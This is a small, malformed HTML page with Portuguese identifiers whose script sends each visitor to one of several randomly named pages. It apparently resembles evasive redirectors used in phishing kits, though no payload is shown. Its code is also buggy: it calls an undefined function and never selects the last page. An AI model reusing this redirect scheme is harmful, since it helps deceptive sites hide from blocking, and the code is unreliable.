<html> <HEAD>
<title> </title>
<style type="text/css">
.style1 { font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold;}
</style>
<body onLoad="__loadEsconde();">
<div id="carregador_pai">
<div id="carregador">
<div align="center" class="style1"> </div></div></div>
</body>
<SCRIPT LANGUAGE="JavaScript">
var howMany = 9;
var page = new Array(howMany+1);

page[0]="SHDF98HFS9DS.html";
page[1]="S8DFSU9SDFU9.html";
page[2]="US89FS98DUFS.html";
page[3]="HIUHASAU7898.html";
page[4]="G78SHFSF8SS9.html";
page[5]="H347HR3883H8.html";
page[6]="N9D8FS9DFS98.html";
page[7]="B762723737B2.html";
page[8]="N2342N4922N2.html";
page[9]="HA8HDASH2329.html";
page[10]="9WN67257HJK6.html";

function rndnumber(){
var randscript = -1;
while (randscript < 0 || randscript > howMany || isNaN(randscript)){
randscript = parseInt(Math.random()*(howMany+1));
}
return randscript;
}
quo = rndnumber();
quox = page[quo];
window.location=(quox);
</SCRIPT>
</HEAD>
</html>

